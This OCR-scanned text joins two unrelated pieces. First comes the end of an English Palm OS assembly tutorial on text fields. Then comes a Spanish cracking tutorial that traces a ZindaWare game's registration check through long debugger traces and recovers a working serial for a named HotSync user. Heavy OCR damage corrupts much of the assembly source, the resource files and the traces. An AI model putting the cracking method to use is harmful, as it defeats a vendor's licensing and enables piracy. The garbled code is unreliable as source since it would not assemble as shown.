FIELD ID SourceText AT (80 40 40 15) USABLE LEFTALIGN EDITABLE UNDERLINED 


FIELD ID DestText AT (80 76 40 15) USABLE LEFTALIGN EDITABLE UNDERLINED 


¡ First the coordinates and size are specified and then the rest. 
BUTTON "Go for it!" ID Go AT (49 116 40 15) USABLE LEFTANCHOR FRAME 


END 


ALERT EmtpyField 

INFORMATION 

BEGIN 
TITLE "Empty Field" 
MESSAGE "Input something please!" 
BUTTONS "Ok" 

END 


ALERT MyAbout 

INFORMATION 

BEGIN 
TITLE "About this Tute" 
MESSAGE "Third tutorial. Using Fields." 
BUTTONS "Kk" 

END 


; End of the .rcp file 


This are the contents of Fields.h: 


define MyForm 1 
fdefine Go 1105 

fdefine EmptyField 1001 
tdefine MyAbout 1002 
tdefine SourceText 1301 
define DestText 1304 


File:Fields.asm 


; The vital parts of code which this tutorial explains are in white font color 
; The rest has been explained in previous tutorials 
; The 'Appl' directive sets the application's name and four character id. 
Appl "EditField", 'Lat3' 
; Pilot.inc contains PalmOS constants, structure offsets, and API trap codes. 


include "Pilot.inc" 


include "Startup.inc" 


; Application-defined resource ids 


MainForm equ 1000 

EmptyField equ 1001 

MyAbout equ 1002 

Go equ 1105 

MenuAbout equ 1002 

DestTextlId equ 1304 

SourceTextlId equ 1301 
data 

global SourceFieldhWnd.1 ¿pointer to the Source 

global DestFieldhWnd.1 ¿pointer to the Dest 
code 


; DWord PilotMain(Word cmd, void *cmdPBP, Word launchflags) 
; PilotMain is Called by the startup code and implements a simple event 
; handling loop. 


proc PilotMain(cmd.w, cmdPBP.1, launchFlags.w) 
local err.w 
local evt .EventType 


beginproc 
tst.w cmd (a6) ¿sysAppLaunchCmdNormallLaunch is 0 


bne PmReturn 


¿not a normal launch, bag out 


systrap FrmGotoForm (+MainForm.w) 


. 
, 


. 
, 


, 


PmEventLoop 


; EventLoop 


void FrmGotoForm ( 
Word formld 
); 


formId = Resource ID del Form en cuestion 


systrap EvtGetEvent (8evt (a6), tevtWaitForever.w) 


; System gets first chance to handle the event 


systrap SysHandleFEvent ($evt (a6)) 


SysHandleEvent handles defaults for system events 
Boolean SysHandleEvent ( 
EventPtr eventbP 


); 


¿ eventP = Puntero a un evento 
tst.b rel0) ¿handled? 
bne.s PmEventDone ¡yep 


; Menu handler gets second chance to handle the event 


systrap MenuHandleEvent (860, 8evt(a6), $terr(a6)) 


. 
, 


menu. 


penDownEvent and winEnterEvent. 


tst.b rel0) 
bne.s PmEventDone 


MenuHandleEvent handles events in the current 


This routine handles two types of events, 


Boolean MenuHandleEvent ( 
MenuBarPtr MenubP, 
EventPtr event, 

WordPtr error 


); 


¿handled? 
¡Yep 


; Application handler gets third chance to handle the event 


call ApplicationHandleEvent ($evt (a6)) 
tst.b rel0) ¿handled? 
bne.s PmEventDone ¡yep 


. 
, 


. 
, 


. 
, 


. 
, 


Form handler gets fourth chance to handle the event 


call MainFormHandleEvent (£evt (a6)) 
tst.b rel0) ¿handled? 
bne.s PmEventDone ¡yep 


still not handled. We're not interested in it anymore so let the 
default form handler take it. 


systrap FrmGetActiveForm() 
systrap FrmHandleFvent (a0.1, evt (a6)) 


Return from PilotMain when an appStopEvent is received 


PmEventDone 

cmpi.w  tfappStopEvent,evt+EventType.eType (a6) ¡time to stop? (CMPI = 
CoMPare Immediate) 

bne.s PmEventLoop ¿nope, loop until it is 
PmReturn 

moveq +0,d0 ; moveq = MOVE 8-bit 
immediate 


endproc 


, 


Boolean ApplicationHandleEvent (EventType *pevt) 
Handles these events: 
frmLoadEvent 


proc ApplicationHandleFEvent (pevt.l) 


beginproc 
movem.1l a3,-(a7) ; Save registers we're going to trash 
¡; movem = MOVE Multiple 
; they are moved to the stack which is then 
decremented 
movea.l pevt (a6),a0 ¡¿ a0 = pevt 


. 
, 


. 
, 


¿ movea = move address 
Handle frmLoadEvents 
cmpi.w  +frmLoadEvent,EventType.eType (a0) 
bne AHENotHandled 
Initialize the form and make it active 


systrap FrmInitForm(EventType.data+frmLoad.formID (a0) .w) 


move .Zl 


a0,a3 


save a copy of FormPtr for later 


systrap FrmSetActiveForm(a0.1) 


systrap FrmGetObjJectIndex(a3.1, fFSourceTextlId.w) 


the form's objects list. 


form. 


Returns the item number of an object. 
The item number is the position of the object in 


Word FrmGetObjectIndex (FormPtr frm,Word objJID) 
frmPtr: Pointer to memory block that contains the 


objID : ID of an object in the form. 


systrap FrmGetObjectPtr (a3.1,d0.w) 


object in a form. 


contains the form. 


move. 1l 


systrap 
systrap 
move.]l 


moveq.1l 
bra.s 


AHENotHandled 


clr.b 


AHEReturn 


movem.Zl 


endproc 


, 
. 
, 


. 
, 


proc MainFormHandleEvent (pevt.1l) 


Returns a pointer to the data structure of an 


void * FrmGetObjectPtr (FormPtr frm,Word objIndex) 
frm : Pointer to memory block that 


obJIndex : Item number of the object. 


a0, SourceFieldhWnd (a5) 


save the field ptr away 


FrmGetObjectIndex(a3.1, fDestTextId.w) 
FrmGetObjectPtr (a3.1,d0.w) 
a0,DestFieldhWnd (a5) 


$1,d0 
AHEReturn 


el0 


(a7)+,a3 


¿event handled 


CLR = Clear an Operand 


Boolean MainFormHandleEvent (EventType *pevt) 


Handles these 
frmOpenEvent, 


beginproc 


movea.l pevt (a6),a0 


events: 


frmMenuEvent, 


ctlSelectEvent 


¡¿ a0 = addres of pevt 


move.w  EventType.eType (a0),d0 ; d0 now contains the Type of 
event 


; Handle frmOpenEvent 


Ccmp . w +frmOpenEvent,d0 
bne MFH1 


¿; Draw the form 


systrap FrmGetActiveForm() 


systrap FrmDrawForm(a0.1) 
bra MFHReturn 


moveq.1 +1,d0 
bra MFHReturn 


; Handle frmMenuEvent 
MFH1 
Ccmp . w fmenuEvent,d0 


bne MFH2 


Ccmp . w fMenuAbout,EventType.data+menu.itemID(a0) 
bne MFHNotHandled 


systrap FrmAlert (fMyAbout .w) 


; Handle ctlSelectEvent 


MFH2 
Ccmp .w tctlSelectEvent,d0 
bne MFHNotHandled 
Ccmp . w +Go, EventType.data+ctlEnter.controlID(a0) 
; here we check if the component that triggered the event is our 'Go' button 
bne MFHNotHandled 
jsr ReadAndSet (pc) 
; JSR = Jump Subroutine. 
; In this case, the Program Counter is passed as a parameter 
MFHNotHandled 
ELE rel0) 
MFHReturn 
endproc 


proc ReadAndSet () 


beginproc 
move.l1l  SourceFieldhWnd (a5),a0 


; FldGetTextPtr parameter is moved to AO 

systrap FldGetTextPtr (a0.1) 

; FldGetTextPtr returns a pointer to the text in the field or NULL. 
¿ Function prototype: 


¿ CharPtr FldGetTextPtr ( 

; FieldPtr fld 

o); 

; It's only parameter is a pointer to a Field. 


cmp.1l $+0,a0 
; is there any text in the field? 


beg Nolnput 
¿ No! warn the user 
; Remember that BEO = Branch if EQual (JZ) 


move.l a0,a3 
¿ copy that ptr to the A3 register 


systrap Strlen(a0.1) 

; how long is that string? 

; Strlen takes one parameter, a pointer to a String 
¿ Function prototype: 


¿ Ulnt StrLen ( 

¿ CharPtr src 

po); 

¡; After Strlen is executed, the string's length is in the DO register 


move.l  DestFieldhWnd(a5),a0 
; move the Handle of the Field to AO 


systrap FldInsert (a0.1,a3.1,d0.w) 
; Here we insert text into one field using FldInsert. 
¿ Function prototype: 


¿Boolean FldIinsert ( 

; FieldPtr fld, 

¿ CharPtr insertChars, 
¿ Word insertlen 

po); 


; Íld is a pointer to the field object to insert to. 

; insertChars is a pointer to a string 

; insertlen is the size of this string, in our Case the size was returned by 
StrLen and is indicated in 

; the DO register. 


bra EndOfItAll 
¿ JMP to ENdOfItAll 


NolInput 

systrap FrmAlert (+EmptyField.w) 

¡ Warn the user due to an empty field 
ENdOfItAll 
endproc 


p- RESOULCES: TATTOO OSA OOO SRA 


; 'pref' resource. Defines app launch flags, stack and heap size 


res 'pref', 1 


ac. w sysAppLaunchFlagNewStack |sysAppLaunchFlagNewGlobal s | 
sysAppLaunchFlagUIApp|sysAppLaunchFlagSubCall 

dc.l $1000 ¡ stack size 

dae:il $1000 ; heap size 


; Form resource 
res 'tFRM', MainForm, "tfrm03e8.bin" 
¿ Version resource 
res 'tver', 1 
dc.b LO 0 
; Menu resource 
res 'MBAR', 1000, "MBARO3e8.bin" 
; Alert resources 
res 'Talt', EmptyField, "Talt03e9.bin" 


res 'Talt', MyAbout, "Talt03ea.bin" 


File:Fields.h 


fdefine MyForm 1 
fdefine Go 1105 

fdefine EmptyField 1001 
tdefine MyAbout 1002 


fdefine SourceText 1301 
fdefine DestText 1304 


File:Fields.bat 


pilrc Fields.rcp 
pila Fields.asm 


File:MBARO3e8.bin 


vy q 0 JB é ROptions About This program.. 


File:Talt03e9.bin 


Empty Field Input something please! Ok 


File:Talt03ea.bin 


About this Tute Third tutorial. Using Fields. K 


File:tFRMO3e8.bin 


E ehZ" Aé This time we use Fields! | ) Source Text S L Dest. Text 
( (?e 
PL ( ?2e 
014 (1 É. Go for 181 
ource Text Mover Y Source Text over 
_ AO | 
EN 


About this Tute 


X 
0 
(0 Dest Tex a - Dest, Text hilo wear ula 


pon 


(3) Third tutorial. Using 


> [s o for it! ] “ Fields. 


That's it! Compile resources with 'pilrc Fields.rcp' and assemble the .asm (and link) using 'pila Fields. asm'. 
| hope his paper was in some way usefull to you. Don't hesitate to write to me about doubts,comments, 
requests or whatever you want. Mail me to latigo_at ciudad dot com dot ar. See ya next time! Bye. 


Latigo 08/October/2k 
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INTRODUCCION 


Análisis de las ventanas: 


Register i 


Registration enables all features in 
the game. Toregister, go to 
www.ZindaWare.corn to purchase a 
registration key. 


The key you entered is 
in the wrong form, 
please make sure you 
didn't misenter it. If you 


LGA 
For more information, tap the "¡" o E, mea Ela ay 


] ] wizard at 
symbol in the upper-right corner. http:77www.ZindaWar 
HotSync e.coméfsupport to verify 
Name: compaq that you wrote ¡it down 
Key: 132456790 [KeyBd..] correctly. 


Register i 


Registration enables all features in 
the game. To register, go to 
www.ZindaWare.corn to purchase a 
registration key. 


This is not the correct 
key for your HotSync 
name. Please make sure 
you didn't mistype part 
0 of the key. If you didn't, 


For more information, tap the *i 


symbol in the upper-right corner. On CRERAp reas 


http:7/www.zindaware 
HotSync .com/support to 
Name: compaq generate the correct 


2 mensajes diferentes de error 


AL ATAQUE 


OPCION I : Encontrar un serial HotSync/Code en el Código vivo. 


Desensamblamos con el PalmDemon v0.27 y no encontramos ninguna referencia a una TALT de error, pero en 
el mismo Palmdemon v0.27 vemos una TALT que nos pone como cabecera "Info" y esta en 1100 (0x44C) 


Resource ID: 1100 (0x440] 


Esta misma TALT sirve para mostrar ambos mensajes, Buscamos esta ventana en el código desensamblado, 
guardemos el desensamblado en un archivo de texto (con extensión *.txt) abrimos el archivo 
desensamblado con el Ultraedit32 vl0a y buscamos con Control+F la cadena "44C" , buscamos los mensajes 
de los errores en el mismo PalmDemon podremos verlos en el ramal izquierdo que dice "Strings" y 
encontramos los siguientes errores: 


7000 (0x1B58) 

"This is not the correct key for your HotSync name. Please make sure you didn't mistype part of the 
key. If you didn't, use the key wizard at http://www.zindaware.com/support to generate the correct 
key." 


7100 (Ox1BBC) 
"The key you entered is in the wrong form, please make sure you didn't misenter it. If you didn't, use 
the key wizard at http://www.ZindaWare.com/support to verify that you wrote it down correctly." 


7200 (0x1C20) 
"Thank you for registering! Your support helps to make sure cool games continue to get developed for 
the Palm. Your reg key is below." 


Entramos al Ultraedit32 y buscamos la cadena "$1B58", Ojo Aquí la verdadera búsqueda seria 
"$S1B58044C", ¿Porque?, Pues porque "044C" es el de la cabecera "Info" de la TALT y el "1B58" el 
mensaje que se mete en la TALT, así que lo que debemos buscar en realidad será, la cadena, Presionando 
Control+F ,La cadena que buscamos solo hay una referencia en en el desensamblado del "CODE (Seg: 
0x03)" (Previamente desensamblado) 


Caemos en: 


0000FDBO 2F 3C 1B 58 04.. 

0000FDB6 60 OA BRA.S LOC_FDC2 
0000FDB8 20 00 MOVE.L DO, DO 
O000FDBA 20 00 MOVE.L DO, DO 


Cargando el palmdebugger y poniendo un Breakpoint atb "_D1kGetSyncInfo" saltamos a, y revizamos las 
siguientes instrucciones. 

t (Enter varias veces) 
EXCEPTION 1D = $80 
0005F6B8 *UNLK A6 | 4E5E 
0005F6BA *RTS | 4E75 
0005F852 *ADDO.W $$04,A7 | 584F 

0005F854 *PEA -$127E(A5) | 486D ED82 
0005F858 *_Strlen ; $1001C27E | 4E4F A0C7 
EXCEPTION 1D = $80 

0005F85C *TST.W DO | 4A40 

0005F85E *ADDO.W +$04,A7 | 584F 

Will Branch 
0005F860 *BNE.S *+$000A ; 0005F86A | 6608 


0005F86A *MOVE.L A3,-(A7) | 2FO0B 
0005F86C *PEA -$127E(A5) | 486D ED82 
0005F870 *MOVE.L A2,-(A7) | 2FOA 

0005F872 *PEA *+$0010 ; 0005F882 | 487A 000E 
0005F876 *PEA *+$50006 ; 0005F87C | 487A 0004 
0005F87A *ADDI.L *SFFFFFE66, (A7) ; "...f' | 0697 FFFF FE66 

0005F880 *RTS(JSR) ILLEGAL ADDRESS: FE6CF87B-$0001; FE6CF87B | 4E75 
0005F6E2 *LINK A6,-$001C | 4E56 FFE4 


0005F6E6 *MOVEM.L de | 48E7 1F38 
0005F6EA *MOVE.L $0008(A6),A4 | 286E 0008 
0005F6EE *MOVE.L AR 2 | 246E 000€ 
0005F6F2 *MOVE.B (A4),D3 | ona 

0005F6F4 *CMPI.B Hs30, > 5 “br | 0cós 6036 


Will Not Branch 

0005F6F8 *BLT.S *+50008 ; 0005F700 | 6D06 
0005F6FA *CMPI.B H$$39,D3 ; '9' | 0C03 0039 
Will Branch 
0005F6FE *BLE.S *+$000A ; 0005F708 | 6F08 
0005F708 *MOVE.L A4,-(A7) | 2F0C 

0005F70A *_StrATol ; $1001C770 | 4E4F AOCE 
EXCEPTION 1D = $80 

0005F70E *MOVE.L DO,A3 | 2640 

0005F710 *CMP.L ¿i$00010000,A3 | B7FC 0001 0000 <--—- Compara (0x10000=65536)Con A3 
0005F716 *ADDO.W +4$04,A7 | 584F <-—-- Corregir la pila A7 

Will Not Branch 

0005F718 *BLE.S *+$000A ; 0005F722 | 6F08 ; Debugger no salta si no es igual a 65536 


0005F71A *MOVE.W H$800B,DO ; '..' | 303C 800B 
Will Branch 

0005F71E *BRA.W *+$00E0 ; O005F7FE | 6000 OODE 
0005F7FE *MOVEM.L (A7)+,D3-D7/A2-A4 | 4CDF 1CF8 
0005F802 *UNLK A6 | 4E5E 

0005F804 *RTS | 4E75 

0005F882 *MOVE.W DO,D3 | 3600 

0005F884 *CMPI.W $$800C,D3 ; '..' | 0043 800€ 
0005F888 *LEA $000C(A7),A7 | 4FEF 000€ 


Will Branch 
0005F88C *BNE.S *+$000A ; 0005F896 | 6608 
0005F896 *TST.W D3 | 4A43 

Will Branch 
0005F898 *BNE.S *+$0008 ; O005F8A0 | 6606 
0005F8A0 *MOVEO.L +$00,D5 | 7A00 

0005F8A2 *MOVEO.L +$00,D6 | 7C00 


En 0005F710 CMP.L +$00010000,A3 0x10000 es 65536 en decimal, Aquí se compara con A3, salgamos del 
debugger "g" y registremos con este número de serie "65536" en el registro del emulador y dejemos el 
mismo breakpoint y paramos en: 


EXCEPTION ID = $80 


0005F6B4 *_DlkGetSyncInfo ; $100535FA | 4E4F A2A9 
t (y varios enter para seguir paso a paso Cada instrucción) 
EXCEPTION 1D = $80 


0005F6B8 *UNLK A6 | 4E5E 
0005F6BA *RTS | 4E75 


0005F852 *ADDO.W +$$04,A7 | 584F 

0005F854 *PEA -$127E(A5) | 486D ED82 
0005F858 *_Strlen ; $1001C27E | 4E4F A0C7 
EXCEPTION ID = $80 

0005F85C *TST.W DO | 4A40 

0005F85E *ADDO.W +$$04,A7 | 584F 

Will Branch 
0005F860 *BNE.S *+$000A ; 0005F86A | 6608 
0005F86A *MOVE.L A3,-(A7) | 2FO0B 


0005F86C *PEA -$127E(A5) | 486D ED82 
0005F870 *MOVE.L A2,-(A7) | 2FOA 
0005F872 *PEA *+$0010 ; 0005F882 | 
0005F876 *PEA *+$0006 ; 0005F87C | 487A 0004 

0005F87A *ADDI.L HSFFFFFE66, (A7) ; .£' | 0697 FFFF FE66 

RTS(JSR) ILLEGAL ADDRESS: FE6CF87B-$0001; FE6CF87B | 4E75 


487A 000E 


0005F880 * 
0005F6E2 *LINK A6,-$001C | 4E56 FFE4 

0005F6E6 *MOVEM.L Y | 48E7 1F38 
0005F6EA *MOVE.L $0008(A6),A4 | 286E 0008 
0005F6EE *MOVE.L O 2 | 246 000€ 
0005F6F2 *MOVE.B (A4),D3 | len 

0005F6F4 *CMPI.B Es30, se ¿ "0" | 0c03 0030 


Will Not Branch 

0005F6F8 *BLT.S *+$0008 ; 0005F700 | 6D06 

0005F6FA *CMPI.B H$$39,D3 ; '9' | 0C03 0039 
Will Branch 
0005F6FE *BLE.S *+$000A ; 0005F708 | 6F08 

0005F708 *MOVE.L A4,-(A7) | 2F0C 

0005F70A *_StrATol ; $1001C770 | 4E4F AOCE 
EXCEPTION 1D = $80 

0005F70E *MOVE.L DO,A3 | 2640 

0005F710 *CMP.L +$00010000,A3 | B7FC 0001 0000 

0005F716 *ADDO.W +4$04,A7 | 584F 

Will Branch 

0005F718 *BLE.S *+$000A ; 0005F722 | 6F08 <---— Debugger ahora si salta a 0005F722 
0005F722 *MOVE.L A2,-(A7) | 2FOA 


0005F724 *_StrLen ; $1001C27E | 4E4F A0C7 
EXCEPTION 1D = $80 
0005F728 *CMPI.W H$000A,DO ; '..' | 0C40 000A 


0005F72C *ADDQ.W $$04,A7 | 584F 
Will Branch 
0005F72E *BLS.S *+$0038 ; 0005F766 | 6336 
0005F766 *MOVE.L A2,-(A7) | 2FOA 

0005F768 *_StrLen ; $1001C27E | 4E4F A0C7 
EXCEPTION 1D = $80 

0005F76C *MOVE.W DO,D7 | 3E00 

0005F76E *MOVE.L A2,-(A7) | 2F0OA 

0005F770 *PEA -$000C(A6) | 486E FFF4 
0005F774 *_StrCopy ; $1001C044 | 4E4F AOC5 
EXCEPTION ID = $80 

0005F778 *LEA $000C(A7),A7 | 4FEF 000€ 


0005F77C *MOVEQ.L +$00,D4 | 7800 

0005F77E *MOVEQO.L +$00,D3 | 7600 

Will Branch 

0005F780 *BRA.S *+5004A ; 0005F7CA | 6048 
0005F7CA *CMP.W D7,D3 | B647 

Will Branch 

0005F7CC *BCS.S *-$004A ; 0005F782 | 65B4 
0005F782 *MOVEO.L +$00,DO | 7000 

0005F784 *MOVE.W D3,DO | 3003 

0005F786 *LEA -$000C(A6),A0 | 41EE FFF4 
0005F78A *MOVEQO.L +$00,D5 | 7A00 

0005F78C *MOVE.B $00(A0,DO0O.L),D5 | 1A30 0800 
0005F790 *LSR.W 4$01,DO | E248 

0005F792 *ADD.W DO,DO | DO40 

0005F794 *MOVE.W DO,D6 | 3C00 

0005F796 *CMP.W D3,D6 | BC43 

0005F798 *SNE.B DO | 56C0 

0005F79A *NEG.B DO 4400 

0005F79C *EXT.W DO | 4880 

0005F79E *MULU.W D5,DO | cOc5 

0005F7A0 *CMP.W D3,D6 | BC43 

0005F7A2 *SEQ.B D1 57C1 

0005F7A4 *NEG.B D1 | 4401 


0005F7A6 *EXT.W D1 | 4881 

0005F7A8 *MULU.W D5,D1 | Cc2C5 
0005F7AA *MOVE.W D3,D2 | 3403 
0005F7AC *ADDQ.W $$01,D2 | 5242 
0005F7AE *MULU.W D1,D2 | C4C1 
0005F7B0 *ADD.W DO,D2 | D440 
0005F7B2 *MULU.W +4$07,D2 | C4FC 0007 
0005F7B6 *TST.W D3 | 4A43 

0005F7B8 *SEQ.B DO | 57C0 

0005F7BA *NEG.B DO | 4400 

0005F7BC *EXT.wW DO | 4880 

0005F7BE *MULU.W +$9D,DO | COFC 019D 
0005F7C2 *ADD.W D2,DO | DO42 
0005F7C4 *ADD.W D4,DO | DO44 
0005F7C6 *MOVE.W DO,D4 | 3800 
0005F7C8 *ADDO.W +$01,D3 | 5243 
0005F7CA *CMP.W D7,D3 | B647 

Will Branch 

0005F7CC *BCS.S *-$004A ; 0005F782 | 65B4 
0005F782 *MOVEO.L +$00,DO | 7000 
0005F784 *MOVE.W D3,DO | 3003 
0005F786 *LEA -$000C(A6),A0 | 41EE FFF4 
0005F78A *MOVEQO.L +$00,D5 | 7A00 
0005F78C *MOVE.B $00(A0,DO0.L),D5 | 1A30 0800 
0005F790 *LSR.W 4$01,DO | E248 
0005F792 *ADD.W DO,DO | DO40 
0005F794 *MOVE.W DO,D6 | 3C00 
0005F796 *CMP.W D3,D6 | BC43 
0005F798 *SNE.B DO | 56C0 

0005F79A *NEG.B DO 4400 

0005F79C *EXT.W DO | 4880 

0005F79E *MULU.W D5,DO | cOc5 
0005F7A0 *CMP.W D3,D6 | BC43 
0005F7A2 *SEQ.B D1 57Cc1 

0005F7A4 *NEG.B D1 | 4401 

0005F7A6 *EXT.W D1 4881 

0005F7A8 *MULU.W D5,D1 | Cc2C5 
0005F7AA *MOVE.W D3,D2 | 3403 
0005F7AC *ADDQ.W $$01,D2 | 5242 
0005F7AE *MULU.W D1,D2 | C4C1 
0005F7B0 *ADD.W DO,D2 | D440 
0005F7B2 *MULU.W 4$07,D2 | C4FC 0007 
0005F7B6 *TST.W D3 | 4A43 

0005F7B8 *SEQ.B DO | 57C0 

0005F7BA *NEG.B DO | 4400 

0005F7BC *EXT.wW DO | 4880 

0005F7BE *MULU.W H$9D,DO | COFC 019D 
0005F7C2 *ADD.W D2,DO | DO042 
0005F7C4 *ADD.W D4,DO | DO44 
0005F7C6 *MOVE.W DO,D4 | 3800 
0005F7C8 *ADDO.W +$01,D3 | 5243 
0005F7CA *CMP.W D7,D3 | B647 

Will Branch 

0005F7CC *BCS.S *-$004A ; 0005F782 | 65B4 
0005F782 *MOVEO.L +$00,DO | 7000 
0005F784 *MOVE.W D3,DO | 3003 
0005F786 *LEA -$000C(A6),A0 | 41EE FFF4 
0005F78A *MOVEQ.L +$00,D5 | 7A00 
0005F78C *MOVE.B $00(A0,DO.L),D5 | 1A30 0800 
0005F790 *LSR.W +$01,DO | E248 
0005F792 *ADD.W DO,DO | DO40 
0005F794 *MOVE.W DO,D6 | 3C00 
0005F796 *CMP.W D3,D6 | BC43 
0005F798 *SNE.B DO | 56C0 

0005F79A *NEG.B DO | 4400 


0005F79C *EXT.wW DO | 4880 
0005F79E *MULU.W D5,DO | cOc5 
0005F7A0 *CMP.W D3,D6 | BC43 
0005F7A2 *SEQ.B D1 | 57C1 
0005F7A4 *NEG.B D1 | 4401 
0005F7A6 *EXT.W D1 | 4881 
0005F7A8 *MULU.W D5,D1 | c2C5 
0005F7AA *MOVE.W D3,D2 | 3403 
0005F7AC *ADDQ.W $$01,D2 | 5242 
0005F7AE *MULU.W D1,D2 | c4c1 
0005F7B0 *ADD.W DO,D2 | D440 
0005F7B2 *MULU.W $$07,D2 | C4FC 
0005F7B6 *TST.W D3 | 4A43 
0005F7B8 *SEQ.B DO | 57C0 
0005F7BA *NEG.B DO | 4400 
0005F7BC *EXT.wW DO | 4880 
0005F7BE *MULU.W H$9D,DO | COFC 
0005F7C2 *ADD.W D2,DO | DO042 
0005F7C4 *ADD.W D4,DO | DO44 
0005F7C6 *MOVE.W DO,D4 | 3800 
0005F7C8 *ADDO.W +$01,D3 | 5243 
0005F7CA *CMP.W D7,D3 | B647 


Will Branch 
0005F7CC *BCS.S *-$004A ; 0005F782 | 65B4 


0007 


019D 


0005F782 *MOVEO.L +$00,DO | 7000 
0005F784 *MOVE.W D3,DO | 3003 

0005F786 *LEA -$000C(A6),A0 | 41EE FFF4 
0005F78A *MOVEQO.L +$00,D5 | 7A00 
0005F78C *MOVE.B $00(A0,DO.L),D5 | 1A30 0800 
0005F790 *LSR.W +$01,DO | E248 

0005F792 *ADD.W DO,DO | DO40 

0005F794 *MOVE.W DO,D6 | 3C00 

0005F796 *CMP.W D3,D6 | BC43 

0005F798 *SNE.B DO | 56C0 

0005F79A *NEG.B DO 4400 

0005F79C *EXT.W DO | 4880 

0005F79E *MULU.W D5,DO | cOc5 

0005F7A0 *CMP.W D3,D6 | BC43 

0005F7A2 *SEQ.B D1 57Cc1 

0005F7A4 *NEG.B D1 | 4401 

0005F7A6 *EXT.W D1 4881 

0005F7A8 *MULU.W D5,D1 | Cc2C5 

0005F7AA *MOVE.W D3,D2 | 3403 

0005F7AC *ADDQ.W $$01,D2 | 5242 
0005F7AE *MULU.W D1,D2 | c4c1 

0005F7B0 *ADD.W DO,D2 | D440 

0005F7B2 *MULU.W +4$07,D2 | C4FC 0007 
0005F7B6 *TST.W D3 | 4A43 

0005F7B8 *SEQ.B DO | 57C0 

0005F7BA *NEG.B DO | 4400 

0005F7BC *EXT.wW DO | 4880 

0005F7BE *MULU.W +$9D,DO | COFC 019D 
0005F7C2 *ADD.W D2,DO | DO042 

0005F7C4 *ADD.W D4,DO | DO44 

0005F7C6 *MOVE.W DO,D4 | 3800 

0005F7C8 *ADDO.W +$01,D3 | 5243 
0005F7CA *CMP.W D7,D3 | B647 

Will Branch 

0005F7CC *BCS.S *-$004A ; 0005F782 | 65B4 
0005F782 *MOVEO.L +$00,DO | 7000 
0005F784 *MOVE.W D3,DO | 3003 

0005F786 *LEA -$000C(A6),A0 | 41EE FFF4 
0005F78A *MOVEQO.L +$00,D5 | 7A00 
0005F78C *MOVE.B $00(A0,DO0.L),D5 | 1A30 0800 
0005F790 *LSR.W 4$01,DO | E248 


0005F792 *ADD.W DO,DO | DO40 
0005F794 *MOVE.W DO,D6 | 3C00 
0005F796 *CMP.W D3,D6 | BC43 
0005F798 *SNE.B DO | 56C0 
0005F79A *NEG.B DO 4400 
0005F79C *EXT.W DO | 4880 
0005F79E *MULU.W D5,DO | cOc5 
0005F7A0 *CMP.W D3,D6 | BC43 
0005F7A2 *SEQ.B D1 57Cc1 
0005F7A4 *NEG.B D1 | 4401 
0005F7A6 *EXT.W D1 4881 
0005F7A8 *MULU.W D5,D1 | Cc2C5 
0005F7AA *MOVE.W D3,D2 | 3403 
0005F7AC *ADDQ.W $$01,D2 | 5242 
0005F7AE *MULU.W D1,D2 | C4C1 
0005F7B0 *ADD.W DO,D2 | D440 
0005F7B2 *MULU.W +$$07,D2 | C4FC 0007 
0005F7B6 *TST.W D3 | 4A43 
0005F7B8 *SEQ.B DO | 57C0 
0005F7BA *NEG.B DO | 4400 
0005F7BC *EXT.wW DO | 4880 
0005F7BE *MULU.W H$9D,DO | COFC 019D 
0005F7C2 *ADD.W D2,DO | DO042 
0005F7C4 *ADD.W D4,DO | DO44 
0005F7C6 *MOVE.W DO,D4 | 3800 
0005F7C8 *ADDO.W +$01,D3 | 5243 
0005F7CA *CMP.W D7,D3 | B647 


Will Branch 
0005F7CC *BCS.S *-$004A ; 0005F782 | 65B4 
0005F782 *MOVEO.L +$00,DO | 7000 


0005F784 *MOVE.W D3,DO | 3003 
0005F786 *LEA -$000C(A6),A0 | 41EE FFF4 
0005F78A *MOVEO.L +$00,D5 | 7A00 
0005F78C *MOVE.B $00(A0,DO0O.L),D5 | 1A30 0800 
0005F790 *LSR.W +$01,DO | E248 
0005F792 *ADD.W DO,DO | DO40 
0005F794 *MOVE.W DO,D6 | 3C00 
0005F796 *CMP.W D3,D6 | BC43 
0005F798 *SNE.B DO | 56C0 
0005F79A *NEG.B DO 4400 
0005F79C *EXT.W DO | 4880 
0005F79E *MULU.W D5,DO | cOc5 
0005F7A0 *CMP.W D3,D6 | BC43 
0005F7A2 *SEQ.B D1 57C1 
0005F7A4 *NEG.B D1 | 4401 
0005F7A6 *EXT.W D1 4881 
0005F7A8 *MULU.W D5,D1 | Cc2C5 
0005F7AA *MOVE.W D3,D2 | 3403 
0005F7AC *ADDQ.W $$01,D2 | 5242 
0005F7AE *MULU.W D1,D2 | C4C1 
0005F7B0 *ADD.W DO,D2 | D440 
0005F7B2 *MULU.W +$$07,D2 | C4FC 0007 
0005F7B6 *TST.W D3 | 4A43 
0005F7B8 *SEQ.B DO | 57C0 
0005F7BA *NEG.B DO | 4400 
0005F7BC *EXT.W DO | 4880 
0005F7BE *MULU.W H$9D,DO | COFC 019D 
0005F7C2 *ADD.W D2,DO | DO42 
0005F7C4 *ADD.W D4,DO | DO44 

* 


0005F7C6 *MOVE.W DO,D4 | 3800 

0005F7C8 *ADDQ.W +$$01,D3 | 5243 

0005F7CA *CMP.W D7,D3 | B647 

Will Not Branch 

0005F7CC *BCS.S *-$004A ; 0005F782 | 65B4 
0005F7CE *MOVE.L A3,DO | 200B 


0005F7DO *CMP.W DO,D4 | B840 <-—-—- Aqui comprueba Fake serial con el Real 
Will Branch 

0005F7D2 *BNE.S *+$0028 ; O005F7FA | 6626 

0005F7FA *MOVE.W H$800C,DO ; '..' | 303C 800€ 

0005F7FE *MOVEM.L (A7)+,D3-D7/A2-A4 | 4CDF 1CF8 

0005F802 *UNLK A6 | 4E5E 

0005F804 *RTS | 4E75 


Borramos todo y hacemos lo mismo y demos de parar exactamente en: 
0005F7DO *CMP.W DO,D4 | B840 <-—-—- Aqui comprueba Fake serial con el Real 
De aquí revisamos en el Palmdebugger lo que contiene el registro "D4" 
Persionamos: 


reg <--- Esto esta solo en la instrucción 0005F7DO (cada instrucción es diferente) 

USP 00000000 

SSP = 0003B9A0 

SR = tSxXNnzvc 

Int = 0 

PC = 0005F7DO 

AO = 0003B9DO 

Al = 1018462C 

A2 = 000049DA 

A3 = 00010000 

Al = 000063DC 

A5 = 00005C58 

AG = 0003B9DC 

A7 = 0003B9A0 

DO = 00010000 <--—- Aquí esta el 65536 que introducimos para que salte el debugger 

D1 = 00000000 

D2 = 00000317 

D3 = 00000006 

D4 = 000023B6 <--- En decimal es "9142"que es el serial para un HotSync/Name "compaq" 

D5 = 00000071 

D6 = 00000004 

